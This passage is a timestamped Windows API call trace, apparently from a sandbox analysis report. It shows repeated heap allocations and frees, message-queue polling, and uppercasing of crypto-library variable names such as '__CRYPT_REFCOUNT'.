hHeap=0x970000) returned 1 [0256.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0256.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51538 [0256.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0256.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51550 [0256.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51580 [0256.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51328 [0256.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0256.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0256.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51598 [0256.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512f8 [0256.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51340 [0256.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0256.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0256.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0256.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0256.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0256.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0256.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0256.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0256.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0256.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0256.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0256.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0256.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0256.805] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0256.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0256.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0256.805] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0256.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0256.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0256.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0256.805] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0256.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0256.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0256.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51478 [0256.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0256.805] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0256.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0256.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0256.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0256.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0256.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0256.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0256.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0256.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0256.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0256.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0256.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0256.806] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0256.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0256.806] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0256.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0256.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0256.806] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0256.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0256.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0256.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0256.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0256.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0256.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0256.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0256.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0256.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0256.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0256.806] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0256.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0256.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0256.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0256.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0256.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0256.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0256.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0256.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0256.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0256.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0256.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0256.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0256.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0256.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0256.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0256.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0256.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0256.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0256.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0256.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0256.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0256.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0256.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0256.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0256.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0256.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0256.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0256.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0256.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0256.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0256.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0256.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0256.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0256.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0256.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0256.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0256.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0256.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0256.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0256.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0256.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0256.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0256.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0256.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0256.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0256.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0256.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0256.808] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0256.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0256.808] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0256.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0256.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0256.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51478 [0256.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0256.808] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0256.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56098 [0256.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0256.808] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0256.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56098 | out: hHeap=0x970000) returned 1 [0256.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0256.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513b8 [0256.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0256.809] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0256.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0256.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0256.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0256.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0256.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0256.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0256.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0256.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0256.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0256.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51418 [0256.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0256.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51598 [0256.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51370 [0256.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51520 [0256.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0256.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0256.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51580 [0256.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512c8 [0256.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51538 [0256.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0256.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0256.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0256.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0256.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0256.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0256.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0256.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0256.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0256.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0256.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0256.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0256.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0256.810] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0256.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0256.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0256.810] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0256.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0256.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0256.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0256.810] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0256.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0256.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0256.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51418 [0256.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0256.810] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0256.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0256.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0256.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0256.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0256.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0256.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0256.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0256.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0256.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0256.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0256.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0256.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0256.811] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0256.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0256.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0256.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0256.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0256.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0256.811] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0256.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0256.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0256.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51310 [0256.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0256.811] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0256.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0256.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0256.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0256.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0256.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0256.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0256.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0256.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0256.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0256.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0256.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0256.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0256.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0256.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0256.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0256.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0256.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0256.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0256.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0256.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0256.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0256.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0256.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0256.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0256.812] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0256.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0256.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0256.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51598 [0256.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0256.812] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0256.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0256.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0256.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0256.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0256.812] 